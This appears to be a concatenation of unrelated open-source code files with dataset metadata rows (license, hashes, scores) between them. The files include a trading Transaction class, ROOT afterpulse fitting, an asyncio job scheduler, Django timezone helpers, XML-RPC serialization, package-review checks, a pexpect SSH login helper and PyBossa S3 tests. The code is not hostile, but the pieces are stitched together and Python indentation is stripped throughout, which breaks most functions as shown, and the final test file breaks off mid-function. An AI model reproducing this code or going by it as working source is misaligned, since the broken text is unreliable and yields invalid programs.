# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# (See http://opensource.org/licenses/BSD-2-Clause)
from .. import utils
class Transaction(object):
def __init__(self, timestamp, quantity, asset, **kwargs):
self.quantity = quantity
try:
self.price = float(kwargs['price']) if 'price' in kwargs else 0.0
except ValueError:
raise ValueError('Invalid price: %s' % kwargs['price'])
self.timestamp = timestamp
self.asset = asset
self.data = kwargs
if type(self.quantity) is not int:
raise ValueError('Invalid quantity: %s' % self.quantity)
if type(self.timestamp) is not int:
raise ValueError('Invalid timestamp: %s' % self.timestamp)
def __eq__(self, other):
for key, value in self.data.iteritems():
if key not in other.data:
return False
if value != other.data[key]:
return False
if self.quantity != other.quantity:
return False
if self.price != other.price:
return False
if self.timestamp != other.timestamp:
return False
if self.asset != other.asset:
return False
return True
def __hash__(self):
return hash(repr(self))
def __repr__(self):
return "%s: %s %s @ %s" % (
utils.timestamp_to_date(self.timestamp, '%Y %m %d'),
self.quantity,
self.asset,
self.price)
def invert_quantity(self):
self.quantity = self.quantity * -1
@property
def size(self):
return abs(self.quantity)
@property
def buy(self):
return self.quantity > 0
@property
def sell(self):
return self.quantity < 0
@property
def zero(self):
return self.quantity == 0
def copy(self, quantity=None):
return Transaction(
self.timestamp,
quantity or self.quantity,
self.asset,
**self.data)
|
agpl-3.0
| 6,468,546,355,782,887,000
| 32.326733
| 77
| 0.645276
| false
| 4.354463
| false
| false
| false
|
ntim/g4sipm
|
sample/run/luigi/contrib/afterpulse.py
|
1
|
3367
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
from ROOT import TH1, Double, ROOT, TF1
def prob_dist_1comp(x, par):
dt = x[0]
amp = par[0]
pL = par[1]
tauL = par[2]
tauTh = par[3]
T = np.exp(-dt / tauTh)
L = np.exp(-dt / tauL)
pTot = 0
pTot += T * (1. - pL) / tauTh
pTot += T * L * pL * (1. / tauL + 1. / tauTh)
return amp * pTot
def prob_dist(x, par):
dt = x[0]
amp = par[0]
pS = par[1]
pL = par[2]
tauS = par[3]
tauL = par[4]
tauTh = par[5]
T = np.exp(-dt / tauTh)
S = np.exp(-dt / tauS)
L = np.exp(-dt / tauL)
pTot = 0
pTot += T * (1. - pS) * (1. - pL) / tauTh
pTot += T * S * pS * (1. - pL) * (1. / tauS + 1. / tauTh)
pTot += T * L * pL * (1. - pS) * (1. / tauL + 1. / tauTh)
pTot += T * S * L * pS * pL * (1. / tauS + 1. / tauL + 1. / tauTh)
return amp * pTot
def fit(h, xlow=50):
# Set default fitter.
ROOT.Math.MinimizerOptions.SetDefaultTolerance(1e-3)
ROOT.Math.MinimizerOptions.SetDefaultMinimizer("Minuit2")
ROOT.Math.MinimizerOptions.SetDefaultMaxIterations(1000)
ROOT.Math.MinimizerOptions.SetDefaultMaxFunctionCalls(1000)
ROOT.Math.MinimizerOptions.SetDefaultPrecision(1e-9)
# Fit thermal noise component.
preFit = TF1("preFit", "[0]*exp(-x/[1])", 600, h.GetBinLowEdge(h.GetNbinsX()))
preFit.SetParameter(1, 1000)
preFit.SetParLimits(1, 10, 10000) # 100kHz to 10MHz
h.Fit(preFit, "RN")
# Fit long component.
preFit2 = TF1("fitDeltaTOneComp", prob_dist_1comp, 400, h.GetBinLowEdge(h.GetNbinsX()), 4)
preFit2.SetParNames("A", "P_{l}", "#tau_{l}", "#tau_{th}")
preFit2.SetParameters(1., 0.2, 150, preFit.GetParameter(1))
preFit2.SetParLimits(1, 0.01, 1.)
preFit2.SetParLimits(2, 80., 240.)
preFit2.SetParLimits(3, preFit.GetParameter(1) - 3. * preFit.GetParError(1), preFit.GetParameter(1) + 3. * preFit.GetParError(1))
h.Fit(preFit2, "RNM")
# Fit complete distribution.
fit = TF1("fitDeltaT", prob_dist, xlow, h.GetBinLowEdge(h.GetNbinsX()), 6)
fit.SetParNames("A", "P_{s}", "P_{l}", "#tau_{s}", "#tau_{l}", "#tau_{th}")
fit.SetParameters(1., 0.2, preFit2.GetParameter(1), 50, preFit2.GetParameter(2), preFit.GetParameter(1))
fit.SetParLimits(1, 0.01, 1.)
fit.SetParLimits(2, preFit2.GetParameter(1) - 10. * preFit2.GetParError(1), preFit2.GetParameter(1) + 10. * preFit2.GetParError(1))
fit.SetParLimits(3, 10., 80.)
fit.SetParLimits(4, preFit2.GetParameter(2) - 10. * preFit2.GetParError(2), preFit2.GetParameter(2) + 10. * preFit2.GetParError(2))
fit.SetParLimits(5, preFit.GetParameter(1) - 3. * preFit.GetParError(1), preFit.GetParameter(1) + 3. * preFit.GetParError(1))
h.Fit(fit, "RNM")
h.GetListOfFunctions().Add(fit)
# Return results
amp = fit.GetParameter(0)
amp_err = fit.GetParError(0)
p_ap_s = fit.GetParameter(1)
p_ap_s_err = fit.GetParError(1)
p_ap_l = fit.GetParameter(2)
p_ap_l_err = fit.GetParError(2)
tau_s = fit.GetParameter(3)
tau_s_err = fit.GetParError(3)
tau_l = fit.GetParameter(4)
tau_l_err = fit.GetParError(4)
tau_th = fit.GetParameter(5)
tau_th_err = fit.GetParError(5)
return amp, amp_err, p_ap_s, p_ap_s_err, p_ap_l, p_ap_l_err, tau_s, tau_s_err, tau_l, tau_l_err, tau_th, tau_th_err, fit.GetChisquare(), fit.GetNDF()
|
gpl-3.0
| -5,261,657,332,472,781,000
| 40.567901
| 153
| 0.610039
| false
| 2.457664
| false
| false
| false
|
cedadev/cloudhands-burst
|
cloudhands/burst/agent.py
|
1
|
2328
|
#!/usr/bin/env python
# encoding: UTF-8
import asyncio
from collections import namedtuple
try:
from functools import singledispatch
except ImportError:
from singledispatch import singledispatch
import logging
import sqlite3
import warnings
from cloudhands.common.connectors import initialise
from cloudhands.common.connectors import Registry
Job = namedtuple("Job", ["uuid", "token", "artifact"])
class Agent:
def __init__(self, workQ, args, config):
self.work = workQ
self.args = args
self.config = config
@staticmethod
def queue(args, config, loop=None):
return asyncio.Queue(loop=loop)
@property
def callbacks(self):
raise NotImplementedError
def jobs(self, session):
raise NotImplementedError
@asyncio.coroutine
def __call__(self, loop, msgQ):
raise NotImplementedError
@singledispatch
def message_handler(msg, *args, **kwargs):
warnings.warn("No handler for {}".format(type(msg)))
pass
@asyncio.coroutine
def operate(loop, msgQ, workers, args, config):
log = logging.getLogger("cloudhands.burst.operate")
session = Registry().connect(sqlite3, args.db).session
initialise(session)
tasks = [asyncio.Task(w(loop, msgQ, session)) for w in workers]
pending = set()
log.info("Starting task scheduler.")
while any(task for task in tasks if not task.done()):
yield from asyncio.sleep(0)
for worker in workers:
for job in worker.jobs(session):
if job.uuid not in pending:
pending.add(job.uuid)
log.debug("Sending {} to {}.".format(job, worker))
yield from worker.work.put(job)
pause = 0.1 if pending else 1
yield from asyncio.sleep(pause)
try:
while True:
msg = msgQ.get_nowait()
try:
act = session.merge(message_handler(msg, session))
except Exception as e:
session.rollback()
log.error(e)
else:
pending.discard(act.artifact.uuid)
session.close() # Refresh or expire not effective here
log.debug(msg)
except asyncio.QueueEmpty:
continue
|
bsd-3-clause
| -3,134,247,760,245,154,000
| 27.048193
| 75
| 0.60567
| false
| 4.36773
| false
| false
| false
|
orlenko/bccf
|
src/django_cron/timezone.py
|
1
|
8256
|
"""Timezone helper functions.
This module uses pytz when it's available and fallbacks when it isn't.
"""
from datetime import datetime, timedelta, tzinfo
from threading import local
import time as _time
try:
import pytz
except ImportError:
pytz = None
from django.conf import settings
__all__ = [
'utc', 'get_default_timezone', 'get_current_timezone',
'activate', 'deactivate', 'override',
'is_naive', 'is_aware', 'make_aware', 'make_naive',
]
settings.USE_TZ = False
# UTC and local time zones
ZERO = timedelta(0)
class UTC(tzinfo):
"""
UTC implementation taken from Python's docs.
Used only when pytz isn't available.
"""
def __repr__(self):
return "<UTC>"
def utcoffset(self, dt):
return ZERO
def tzname(self, dt):
return "UTC"
def dst(self, dt):
return ZERO
class LocalTimezone(tzinfo):
"""
Local time implementation taken from Python's docs.
Used only when pytz isn't available, and most likely inaccurate. If you're
having trouble with this class, don't waste your time, just install pytz.
"""
def __init__(self):
# This code is moved in __init__ to execute it as late as possible
# See get_default_timezone().
self.STDOFFSET = timedelta(seconds=-_time.timezone)
if _time.daylight:
self.DSTOFFSET = timedelta(seconds=-_time.altzone)
else:
self.DSTOFFSET = self.STDOFFSET
self.DSTDIFF = self.DSTOFFSET - self.STDOFFSET
tzinfo.__init__(self)
def __repr__(self):
return "<LocalTimezone>"
def utcoffset(self, dt):
if self._isdst(dt):
return self.DSTOFFSET
else:
return self.STDOFFSET
def dst(self, dt):
if self._isdst(dt):
return self.DSTDIFF
else:
return ZERO
def tzname(self, dt):
return _time.tzname[self._isdst(dt)]
def _isdst(self, dt):
tt = (dt.year, dt.month, dt.day,
dt.hour, dt.minute, dt.second,
dt.weekday(), 0, 0)
stamp = _time.mktime(tt)
tt = _time.localtime(stamp)
return tt.tm_isdst > 0
utc = pytz.utc if pytz else UTC()
"""UTC time zone as a tzinfo instance."""
# In order to avoid accessing the settings at compile time,
# wrap the expression in a function and cache the result.
_localtime = None
def get_default_timezone():
"""
Returns the default time zone as a tzinfo instance.
This is the time zone defined by settings.TIME_ZONE.
See also :func:`get_current_timezone`.
"""
global _localtime
if _localtime is None:
if isinstance(settings.TIME_ZONE, basestring) and pytz is not None:
_localtime = pytz.timezone(settings.TIME_ZONE)
else:
_localtime = LocalTimezone()
return _localtime
# This function exists for consistency with get_current_timezone_name
def get_default_timezone_name():
"""
Returns the name of the default time zone.
"""
return _get_timezone_name(get_default_timezone())
_active = local()
def get_current_timezone():
"""
Returns the currently active time zone as a tzinfo instance.
"""
return getattr(_active, "value", get_default_timezone())
def get_current_timezone_name():
"""
Returns the name of the currently active time zone.
"""
return _get_timezone_name(get_current_timezone())
def _get_timezone_name(timezone):
"""
Returns the name of ``timezone``.
"""
try:
# for pytz timezones
return timezone.zone
except AttributeError:
# for regular tzinfo objects
local_now = datetime.now(timezone)
return timezone.tzname(local_now)
# Timezone selection functions.
# These functions don't change os.environ['TZ'] and call time.tzset()
# because it isn't thread safe.
def activate(timezone):
"""
Sets the time zone for the current thread.
The ``timezone`` argument must be an instance of a tzinfo subclass or a
time zone name. If it is a time zone name, pytz is required.
"""
if isinstance(timezone, tzinfo):
_active.value = timezone
elif isinstance(timezone, basestring) and pytz is not None:
_active.value = pytz.timezone(timezone)
else:
raise ValueError("Invalid timezone: %r" % timezone)
def deactivate():
"""
Unsets the time zone for the current thread.
Django will then use the time zone defined by settings.TIME_ZONE.
"""
if hasattr(_active, "value"):
del _active.value
class override(object):
"""
Temporarily set the time zone for the current thread.
This is a context manager that uses ``~django.utils.timezone.activate()``
to set the timezone on entry, and restores the previously active timezone
on exit.
The ``timezone`` argument must be an instance of a ``tzinfo`` subclass, a
time zone name, or ``None``. If is it a time zone name, pytz is required.
If it is ``None``, Django enables the default time zone.
"""
def __init__(self, timezone):
self.timezone = timezone
self.old_timezone = getattr(_active, 'value', None)
def __enter__(self):
if self.timezone is None:
deactivate()
else:
activate(self.timezone)
def __exit__(self, exc_type, exc_value, traceback):
if self.old_timezone is not None:
_active.value = self.old_timezone
else:
del _active.value
# Templates
def template_localtime(value, use_tz=None):
"""
Checks if value is a datetime and converts it to local time if necessary.
If use_tz is provided and is not None, that will force the value to
be converted (or not), overriding the value of settings.USE_TZ.
This function is designed for use by the template engine.
"""
should_convert = (isinstance(value, datetime)
and (settings.USE_TZ if use_tz is None else use_tz)
and not is_naive(value)
and getattr(value, 'convert_to_local_time', True))
return localtime(value) if should_convert else value
# Utilities
def localtime(value, timezone=None):
"""
Converts an aware datetime.datetime to local time.
Local time is defined by the current time zone, unless another time zone
is specified.
"""
if timezone is None:
timezone = get_current_timezone()
value = value.astimezone(timezone)
if hasattr(timezone, 'normalize'):
# available for pytz time zones
value = timezone.normalize(value)
return value
def now():
"""
Returns an aware or naive datetime.datetime, depending on settings.USE_TZ.
"""
if settings.USE_TZ:
# timeit shows that datetime.now(tz=utc) is 24% slower
return datetime.utcnow().replace(tzinfo=utc)
else:
return datetime.now()
# By design, these four functions don't perform any checks on their arguments.
# The caller should ensure that they don't receive an invalid value like None.
def is_aware(value):
"""
Determines if a given datetime.datetime is aware.
The logic is described in Python's docs:
http://docs.python.org/library/datetime.html#datetime.tzinfo
"""
return value.tzinfo is not None and value.tzinfo.utcoffset(value) is not None
def is_naive(value):
"""
Determines if a given datetime.datetime is naive.
The logic is described in Python's docs:
http://docs.python.org/library/datetime.html#datetime.tzinfo
"""
return value.tzinfo is None or value.tzinfo.utcoffset(value) is None
def make_aware(value, timezone):
"""
Makes a naive datetime.datetime in a given time zone aware.
"""
if hasattr(timezone, 'localize'):
# available for pytz time zones
return timezone.localize(value, is_dst=None)
else:
# may be wrong around DST changes
return value.replace(tzinfo=timezone)
def make_naive(value, timezone):
"""
Makes an aware datetime.datetime naive in a given time zone.
"""
value = value.astimezone(timezone)
if hasattr(timezone, 'normalize'):
# available for pytz time zones
value = timezone.normalize(value)
return value.replace(tzinfo=None)
|
unlicense
| 6,542,756,796,065,424,000
| 27.277397
| 81
| 0.645833
| false
| 4.057002
| false
| false
| false
|
asphalt-framework/asphalt-web
|
asphalt/web/rpc/xmlrpc/serialization.py
|
1
|
4239
|
import math
from base64 import b64encode, b64decode
from collections import OrderedDict
from collections.abc import Sequence, Mapping
from datetime import date, datetime
from typing import List, Dict, Any
from xml.sax.saxutils import escape
from asphalt.core.utils import qualified_name
from lxml.etree import Element
__all__ = ('serialize', 'deserialize')
_serializers = OrderedDict()
_deserializers = OrderedDict()
def serialize(obj) -> str:
"""
Serialize the given object into an XML-RPC ``<value>`` element.
:param obj: the object to serialize
:return: an XML fragment
"""
for cls, func in _serializers.items():
if isinstance(obj, cls):
return '<value>%s</value>' % func(obj)
raise TypeError('%s is not serializable' % qualified_name(obj.__class__))
def serializer(cls: type):
def wrapper(func):
_serializers[cls] = func
return func
return wrapper
@serializer(str)
def serialize_str(obj: str) -> str:
return '<string>%s</string>' % escape(obj)
@serializer(bool)
def serialize_bool(obj: bool) -> str:
return '<boolean>%d</boolean>' % obj
@serializer(int)
def serialize_int(obj: int) -> str:
if not -2147483648 <= obj <= 2147483647:
raise ValueError('%d is out of range of XML-RPC (32-bit) integer' % obj)
return '<i4>%d</i4>' % obj
@serializer(float)
def serialize_float(obj: float) -> str:
if math.isnan(obj) or math.isinf(obj):
raise ValueError('XML-RPC does not support serializing infinity or NaN float objects')
return '<double>%s</double>' % str(obj).rstrip('0')
@serializer(bytes)
def serialize_bytes(obj: bytes):
return '<base64>%s</base64>' % b64encode(obj).decode()
@serializer(datetime)
def serialize_datetime(obj: datetime) -> str:
return '<dateTime.iso8601>%s</dateTime.iso8601>' % obj.strftime('%Y%m%dT%H:%M:%S')
@serializer(date)
def serialize_date(obj: date) -> str:
return '<dateTime.iso8601>%s</dateTime.iso8601>' % obj.strftime('%Y%m%dT00:00:00')
@serializer(Sequence)
def serialize_sequence(obj: Sequence) -> str:
payload = [serialize(value) for value in obj]
return '<array><data>%s</data></array>' % ''.join(payload)
@serializer(Mapping)
def serialize_mapping(obj: Mapping) -> str:
payload = '<struct>'
for key, value in obj.items():
serialized_value = serialize(value)
payload += '<member><name>%s</name>%s</member>' % (escape(key), serialized_value)
return payload + '</struct>'
def deserialize(value: Element):
"""
Deserialize an XML-RPC <value> element.
:param value: an XML element with the tag <value>
:return: the deserialized value
"""
child = value[0]
try:
func = _deserializers[child.tag]
except KeyError:
raise LookupError('unknown XML-RPC type: %s' % child.tag) from None
return func(child)
def deserializer(*names: str):
def wrapper(func):
_deserializers.update({key: func for key in names})
return func
return wrapper
@deserializer('string')
def deserialize_str(element: Element) -> str:
return element.text
@deserializer('boolean')
def deserialize_bool(element: Element) -> float:
if element.text == '1':
return True
elif element.text == '0':
return False
else:
raise ValueError('invalid value for boolean: %s' % element.text)
@deserializer('int', 'i4')
def deserialize_int(element: Element) -> int:
return int(element.text)
@deserializer('double', 'float')
def deserialize_float(element: Element) -> float:
return float(element.text)
@deserializer('base64')
def deserialize_base64(element: Element) -> bytes:
return b64decode(element.text)
@deserializer('dateTime.iso8601')
def deserialize_datetime(element: Element) -> datetime:
return datetime.strptime(element.text, '%Y%m%dT%H:%M:%S')
@deserializer('array')
def deserialize_array(element: Element) -> List:
return [deserialize(value) for value in element.findall('data/value')]
@deserializer('struct')
def deserialize_struct(element: Element) -> Dict[str, Any]:
members = element.findall('member')
return {member.find('name').text: deserialize(member.find('value')) for member in members}
|
apache-2.0
| 5,541,318,617,819,902,000
| 25.166667
| 94
| 0.671621
| false
| 3.635506
| false
| false
| false
|
packagecontrol/st_package_reviewer
|
st_package_reviewer/check/file/check_redundant_files.py
|
2
|
1795
|
import logging
from . import FileChecker
l = logging.getLogger(__name__)
class CheckPackageMetadata(FileChecker):
def check(self):
if self.sub_path("package-metadata.json").is_file():
self.fail("'package-metadata.json' is supposed to be automatically generated "
"by Package Control during installation")
class CheckPycFiles(FileChecker):
def check(self):
pyc_files = self.glob("**/*.pyc")
if not pyc_files:
return
for path in pyc_files:
if path.with_suffix(".py").is_file():
with self.file_context(path):
self.fail("'.pyc' file is redundant because its corresponding .py file exists")
class CheckCacheFiles(FileChecker):
def check(self):
cache_files = self.glob("**/*.cache")
if not cache_files:
return
for path in cache_files:
with self.file_context(path):
self.fail("'.cache' file is redundant and created by ST automatically")
class CheckSublimePackageFiles(FileChecker):
def check(self):
cache_files = self.glob("**/*.sublime-package")
if not cache_files:
return
for path in cache_files:
with self.file_context(path):
self.fail("'.sublime-package' files have no business being inside a package")
class CheckSublimeWorkspaceFiles(FileChecker):
def check(self):
cache_files = self.glob("**/*.sublime-workspace")
if not cache_files:
return
for path in cache_files:
with self.file_context(path):
self.fail("'.sublime-workspace' files contain session data and should never be "
"submitted to version control")
|
mit
| 7,026,769,167,104,673,000
| 27.492063
| 99
| 0.597214
| false
| 4.356796
| false
| false
| false
|
HazyResearch/dd-genomics
|
archived/v1/code/gene_pheno_pairs.py
|
1
|
2378
|
import ddext
from ddext import SD
def init():
ddext.input('doc_id', 'text')
ddext.input('sent_id_1', 'int')
ddext.input('mention_id_1', 'text')
ddext.input('wordidxs_1', 'int[]')
ddext.input('words_1', 'text[]')
ddext.input('entity_1', 'text')
ddext.input('type_1', 'text')
ddext.input('correct_1', 'boolean')
ddext.input('sent_id_2', 'int')
ddext.input('mention_id_2', 'text')
ddext.input('wordidxs_2', 'int[]')
ddext.input('words_2', 'text[]')
ddext.input('entity_2', 'text')
ddext.input('type_2', 'text')
ddext.input('correct_2', 'boolean')
ddext.returns('doc_id', 'text')
ddext.returns('sent_id_1', 'int')
ddext.returns('sent_id_2', 'int')
ddext.returns('relation_id', 'text')
ddext.returns('type', 'text')
ddext.returns('mention_id_1', 'text')
ddext.returns('mention_id_2', 'text')
ddext.returns('wordidxs_1', 'int[]')
ddext.returns('wordidxs_2', 'int[]')
ddext.returns('words_1', 'text[]')
ddext.returns('words_2', 'text[]')
ddext.returns('entity_1', 'text')
ddext.returns('entity_2', 'text')
ddext.returns('is_correct', 'boolean')
def run(doc_id, sent_id_1, mention_id_1, wordidxs_1, words_1, entity_1, mtype_1, correct_1, sent_id_2, mention_id_2, wordidxs_2, words_2, entity_2, mtype_2, correct_2):
if 'pos_pairs' in SD:
pos_pairs = SD['pos_pairs']
else:
import os
APP_HOME = os.environ['DD_GENOMICS_HOME']
pos_pairs = set()
gpheno = [x.strip().split('\t') for x in open('%s/onto/data/hpo_phenotype_genes.tsv' % APP_HOME)]
gdisease = [x.strip().split('\t') for x in open('%s/onto/data/hpo_disease_genes.tsv' % APP_HOME)]
for pheno, gene in gpheno + gdisease:
pos_pairs.add((gene, pheno))
SD['pos_pairs'] = pos_pairs
rid = '%s_%s_g%s_p%s' % (doc_id, sent_id_1,
'%d:%d' % (wordidxs_1[0], wordidxs_1[-1]),
'%d:%d' % (wordidxs_2[0], wordidxs_2[-1]),
)
truth = None
if correct_1 and correct_2:
gene = entity_1
for pheno in entity_2.split()[0].split('|'):
if (gene, pheno) in pos_pairs:
truth = True
elif correct_1 is False or correct_2 is False:
truth = False
yield (doc_id,
sent_id_1,
sent_id_2,
rid,
None,
mention_id_1,
mention_id_2,
wordidxs_1,
wordidxs_2,
words_1,
words_2,
entity_1,
entity_2,
truth
)
|
apache-2.0
| -2,130,952,374,785,913,000
| 29.101266
| 168
| 0.584945
| false
| 2.535181
| false
| false
| false
|
dgouldin/djangocon-eu-2015
|
djapi/api/url_registry.py
|
2
|
2925
|
import types
from collections import defaultdict
from functools import wraps
from urlparse import urljoin
from django.contrib.contenttypes.models import ContentType
from django.core.urlresolvers import reverse, NoReverseMatch
LIST_METHODS = ('POST',)
DETAIL_METHODS = ('PUT', 'PATCH', 'DELETE',)
ALL_METHODS = LIST_METHODS + DETAIL_METHODS
model_registry = defaultdict(list)
def register(methods, model):
"""
Decorator for registering lookup functions. Modeled after django.dispatch.receiver.
A lookup_func should return a fully qualified path.
"""
def _decorator(lookup_func):
model_registry[model].append((methods, lookup_func))
return lookup_func
return _decorator
def normalize_channel(path):
"Strip off querystring and trailing slashes"
return path.split('?', 1)[0].rstrip('/')
def find_urls(obj, method):
"Utility to locate URLs that might include details of a given object"
for methods, lookup_func in model_registry[type(obj)]:
if method in methods:
yield lookup_func(obj)
# helpers for generating common URLs
def empty(viewname):
"For URLs that don't require any arguments at all"
url = reverse(viewname)
def _empty(obj):
return url
return _empty
def primary_key(viewname):
"For URLs that accept a primary key as 'pk'"
def _primary_key(obj):
return reverse(viewname, kwargs={'pk': obj.pk})
return _primary_key
def primary_key_filter(viewname):
"For URLs that filter on the primary key field via a query param"
def _primary_key_filter(obj):
pk_field = obj.__class__._meta.pk.name
return "{}?{}={}".format(reverse(viewname), pk_field, obj.pk)
return _primary_key_filter
def foreign_key(viewname, fk_field_name):
"""
For URLs that refer to an instance via a foreign key
Accepts the name of the foreign key
"""
def _foreign_key(obj):
fk_field = obj.__class__._meta.get_field(fk_field_name)
return reverse(viewname, kwargs={'pk': getattr(obj, fk_field.attname)})
return _foreign_key
def generic_foreign_key(viewname, gfk_field_name, model):
"""
For URLs that refer to an instance via a generic foreign key
Accepts the name of the foreign key, and also the model this particular URL
is associated with, since the foreign key can refer to multiple model types
"""
def _generic_foreign_key(obj):
content_type_id = ContentType.objects.get_for_model(model).id
gfk_field = getattr(obj.__class__, gfk_field_name)
ct_field = obj._meta.get_field(gfk_field.ct_field)
if getattr(obj, ct_field.attname) == content_type_id:
return reverse(viewname, kwargs={'pk': getattr(obj, gfk_field.fk_field)})
# this should never happen
raise NoReverseMatch('Unable to resolve generic foreign key for {}'.format(obj))
return _generic_foreign_key
|
mit
| -4,767,235,335,549,177,000
| 30.451613
| 88
| 0.681709
| false
| 3.889628
| false
| false
| false
|
jarod-w/ocsetup
|
ocsetup/sshcmd.py
|
1
|
1977
|
#!/usr/bin/env python
import pexpect
import sys
import gtk
from ovirtnode.ovirtfunctions import log
class PopupEntry(gtk.Dialog):
def __init__(self, label="", title="", parent=None, flags=0, buttons=None):
super(PopupEntry, self).__init__(title, parent, flags, buttons)
self.hbox = gtk.HBox()
self.label = gtk.Label(label)
self.add_button("OK", gtk.RESPONSE_OK)
self.entry = gtk.Entry()
self.entry.set_visibility(False)
self.hbox.pack_start(self.label)
self.hbox.pack_start(self.entry)
self.vbox.pack_start(self.hbox)
self.set_position(gtk.WIN_POS_CENTER_ALWAYS)
def run_and_close(self):
self.show_all()
resp_id = self.run()
text = self.entry.get_text()
self.destroy()
return text
def runcmd(cmd):
child = pexpect.spawn(cmd, logfile=sys.stdout)
while True:
i = child.expect([
pexpect.TIMEOUT,
'Are you sure you want to continue connecting',
'Enter passphrase for key',
'Permission denied, please try again.',
'password: ',
'Permission denied',
pexpect.EOF])
if i == 0:
# TIMEOUT.
return
elif i == 1:
child.sendline('yes')
elif i == 2:
child.send("\r")
elif i == 3:
# wrong password, but you can still try AGAIN.
password = PopupEntry(
label='Password:',
title="Wrong Password?").run_and_close()
elif i == 4:
password = PopupEntry(label='Password:').run_and_close()
child.sendline(password)
elif i == 5:
# LOGIN FAILED
return
elif i == 6:
# LOGIN SUCCEED.
return child
else:
log(
"run cmd error i = %d\n before:%s\nafter:%s" %
(i, child.before, child.after))
|
gpl-2.0
| -8,240,140,385,106,602,000
| 28.954545
| 79
| 0.528073
| false
| 3.96988
| false
| false
| false
|
PyBossa/pybossa
|
test/test_s3_client.py
|
1
|
5554
|
# -*- coding: utf8 -*-
# This file is part of PYBOSSA.
#
# Copyright (C) 2015 Scifabric LTD.
#
# PYBOSSA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PYBOSSA is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with PYBOSSA. If not, see <http://www.gnu.org/licenses/>.
from mock import patch, MagicMock
from nose.tools import assert_raises
import json
from pybossa.s3_client import S3Client, NoSuchBucket, PrivateBucket
class TestS3Client(object):
def make_response(self, text, status_code=200):
fake_response = MagicMock()
fake_response.text = text
fake_response.status_code = status_code
return fake_response
bucket_with_content = (
"""<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>test-pybossa</Name>
<Prefix></Prefix>
<Marker></Marker>
<MaxKeys>1000</MaxKeys>
<IsTruncated>false</IsTruncated>
<Contents>
<Key>16535035993_1080p.mp4</Key>
<LastModified>2016-01-29T08:55:41.000Z</LastModified>
<ETag>"10055dfebe62cf30e34d87fd27b28efc"</ETag>
<Size>11801468</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
<Key>BFI-demo.mp4</Key>
<LastModified>2016-01-29T08:55:38.000Z</LastModified>
<ETag>"b24442a1484b6b8f2b4e08c43e0abd3f"</ETag>
<Size>27063915</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
</ListBucketResult>
""")
empty_bucket = (
"""<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>test-pybossa</Name>
<Prefix></Prefix>
<Marker></Marker>
<MaxKeys>1000</MaxKeys>
<IsTruncated>false</IsTruncated>
</ListBucketResult>
""")
no_such_bucket = (
"""<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>NoSuchBucket</Code>
<Message>The specified bucket does not exist</Message>
<BucketName>test-pybosa</BucketName>
<RequestId>5DB95818E2273F2A</RequestId>
<HostId>2xqg6pMK20zocCIN0DpqzDVEmbNkqKdTrp0BT/K2EUBbSIek5+7333DjDVuvpN0fFR/Pp/+IkM8=</HostId>
</Error>
""")
bucket_with_folder = (
"""<?xml version="1.0" encoding="UTF-8"?>
<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>test-pybossa</Name>
<Prefix></Prefix>
<Marker></Marker>
<MaxKeys>1000</MaxKeys>
<IsTruncated>false</IsTruncated>
<Contents>
<Key>myfolder/</Key>
<LastModified>2016-01-29T08:56:15.000Z</LastModified>
<ETag>"d41d8cd98f00b204e9800998ecf8427e"</ETag>
<Size>0</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
</ListBucketResult>
""")
private_bucket = (
"""<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>AccessDenied</Code>
<Message>Access Denied</Message>
<RequestId>0C189C667703869B</RequestId>
<HostId>e6HNleTSx+vQHCXsjphJNLumbwd2YfYfZMrEBEkGOF/0jCMDZf6RIrgUAooa+HT86f0Azr27/h4=</HostId>
</Error>
""")
@patch('pybossa.s3_client.requests')
def test_objects_return_empty_list_for_an_empty_bucket(self, requests):
resp = self.make_response(self.empty_bucket, 200)
requests.get.return_value = resp
objects = S3Client().objects('test-pybossa')
assert objects == [], objects
@patch('pybossa.s3_client.requests')
def test_objects_return_list_of_object_names_in_a_bucket(self, requests):
resp = self.make_response(self.bucket_with_content, 200)
requests.get.return_value = resp
objects = S3Client().objects('test-pybossa')
assert objects == [u'16535035993_1080p.mp4', u'BFI-demo.mp4'], objects
@patch('pybossa.s3_client.requests')
def test_objects_not_returns_folders_inside_bucket(self, requests):
resp = self.make_response(self.bucket_with_folder, 200)
requests.get.return_value = resp
objects = S3Client().objects('test-pybossa')
assert objects == [], objects
@patch('pybossa.s3_client.requests')
def test_objects_raises_NoSuchBucket_if_bucket_does_not_exist(self, requests):
resp = self.make_response(self.no_such_bucket, 404)
requests.get.return_value = resp
assert_raises(NoSuchBucket, S3Client().objects, 'test-pybossa')
@patch('pybossa.s3_client.requests')
def test_objects_raises_PrivateBucket_if_bucket_is_private(self, requests):
resp = self.make_response(self.no_such_bucket, 403)
requests.get.return_value = resp
